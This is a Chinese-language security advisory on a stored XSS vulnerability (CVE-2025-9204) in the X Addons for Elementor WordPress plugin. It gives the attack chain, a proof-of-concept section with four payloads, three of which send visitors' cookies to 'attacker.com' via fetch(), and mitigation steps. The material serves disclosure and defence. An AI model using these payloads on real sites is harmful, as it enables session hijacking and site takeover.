CVE-2025-9204：WordPress X Addons for Elementor插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-9204

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

X Addons for Elementor（WordPress插件）

漏洞概述

CVE-2025-9204是WordPress插件X Addons for Elementor中存在的一个存储型跨站脚本（Stored XSS）漏洞。该插件是一个Elementor页面构建器的扩展组件，提供了包括YouTube视频嵌入在内的多种页面元素组件。该漏洞存在于插件的YouTube Video ID字段中，由于对用户输入缺乏充分的过滤和转义处理，攻击者可以在该字段中注入恶意的JavaScript代码。

该漏洞的CVSS 3.1评分为6.4分，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要低权限认证（PR:L），无需用户交互（UI:N）。成功利用该漏洞后，攻击者可以在受影响的页面中执行任意Web脚本，当其他用户访问这些页面时，恶意代码将被自动执行。

该漏洞由WordPress安全公司Wordfence的安全研究员发现并报告。由于该插件允许贡献者（contributor）级别及以上的用户编辑内容，因此任何拥有贡献者权限的认证用户都可以利用此漏洞。存储型XSS的危害较大，因为恶意代码会持久存储在服务器端，每次用户访问受影响页面时都会执行，可能导致会话劫持、权限提升、恶意软件分发等多种攻击。

该漏洞影响该插件的所有版本直至1.0.16（含）。Wordfence已在2025年10月3日公开披露此漏洞，建议所有使用该插件的WordPress站点管理员尽快更新到修复版本。

技术细节

该漏洞的根本原因在于X Addons for Elementor插件的YouTube Video ID字段未对用户输入进行充分的清理（sanitization）和输出转义（output escaping）。具体来说，在插件的xa-hero.php文件中，第723行附近的代码直接接收用户输入的YouTube Video ID参数，并将其嵌入到页面输出中，而没有使用WordPress标准的安全函数（如esc_attr()、esc_html()或wp_kses()）进行处理。

从技术角度看，存储型XSS的利用过程如下：

1. 攻击者首先需要拥有一个WordPress站点的认证账户，权限至少为贡献者（contributor）级别。这是因为该插件允许该级别的用户使用Elementor编辑器创建和编辑内容。

2. 攻击者在使用X Addons for Elementor的Hero组件时，在YouTube Video ID字段中输入恶意的JavaScript代码，而不是正常的YouTube视频ID。典型的Payload形式如："abc123\"><script>alert(document.cookie)</script>" 或使用事件处理器如 "abc123\" onload=\"fetch('https://attacker.com/?c='+document.cookie)\""。

3. 由于插件未对输入进行过滤，这段恶意代码被直接保存到WordPress数据库中。

4. 当其他用户（包括管理员）访问包含该组件的页面时，恶意脚本将在受害者的浏览器上下文中执行。由于脚本在站点的安全上下文中运行，攻击者可以窃取用户的会话Cookie、进行权限提升、重定向用户到恶意网站，或者通过管理者的权限执行进一步的攻击操作。

5. 该漏洞的范围（Scope）发生了变化（S:C），这意味着漏洞的影响超出了其直接组件的范围，可能影响到整个WordPress站点的安全。

攻击链分析

STEP 1

步骤1：获取认证账户

攻击者首先需要拥有一个WordPress站点的认证账户，权限至少为贡献者（contributor）级别。可以通过注册开放注册的站点或通过社工等方式获取。

STEP 2

步骤2：创建恶意页面

攻击者使用Elementor编辑器创建一个新页面或编辑现有页面，添加X Addons for Elementor的Hero组件（xa-hero）。

STEP 3

步骤3：注入恶意Payload

在Hero组件的YouTube Video ID字段中输入恶意的JavaScript代码，例如包含cookie窃取脚本或重定向脚本的Payload。由于插件未对该字段进行输入过滤，恶意代码被直接接受。

STEP 4

步骤4：存储恶意内容

攻击者保存页面，恶意脚本随页面内容一起存储到WordPress数据库中。由于这是存储型XSS，恶意代码将持久存在。

STEP 5

步骤5：触发执行

当其他用户（包括管理员）访问包含该组件的页面时，恶意脚本将在受害者的浏览器中自动执行，可窃取会话Cookie、进行权限提升或执行其他恶意操作。

STEP 6

步骤6：权限提升与持久化

如果管理员访问了受感染页面，攻击者可以利用窃取的会话信息以管理员身份登录，创建后门账户或修改站点设置，实现持久化控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-9204 PoC - Stored XSS via Youtube Video ID field -->
<!-- The vulnerability exists in xa-hero.php around line 723 -->
<!-- Attackers with contributor-level access can inject malicious scripts -->

<!-- Step 1: Login as a contributor or higher level user -->
<!-- Step 2: Create or edit a page using Elementor with X Addons Hero widget -->
<!-- Step 3: In the "Youtube Video ID" field, inject the following payload -->

<!-- Payload examples for the Youtube Video ID field: -->

<!-- Payload 1: Basic script injection -->
abc123\"><script>alert('XSS-CVE-2025-9204')</script>

<!-- Payload 2: Cookie stealing -->
abc123\"><script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Payload 3: Event handler injection -->
abc123\" onerror=\"fetch('https://attacker.com/?c='+document.cookie)\" src=\"x

<!-- Payload 4: Using img tag onerror -->
\"><img src=x onerror=fetch('https://attacker.com/?cookie='+document.cookie)>

<!-- After saving the page, when any user visits the affected page, -->
<!-- the malicious script will execute in their browser context. -->

影响范围

X Addons for Elementor <= 1.0.16

防御指南

临时缓解措施

在等待官方修复版本发布期间，建议采取以下临时缓解措施：1）暂时停用X Addons for Elementor插件，直到更新到修复版本；2）如果必须使用该插件，应限制贡献者级别用户的权限，将内容创建权限仅授予受信任的用户；3）部署Web应用防火墙（WAF）规则，过滤常见的XSS攻击向量（如script标签、事件处理器等）；4）定期检查站点内容，搜索是否存在异常的YouTube Video ID字段值；5）启用Wordfence等安全插件的XSS防护功能；6）监控管理员账户的登录活动，及时发现可疑的会话劫持行为。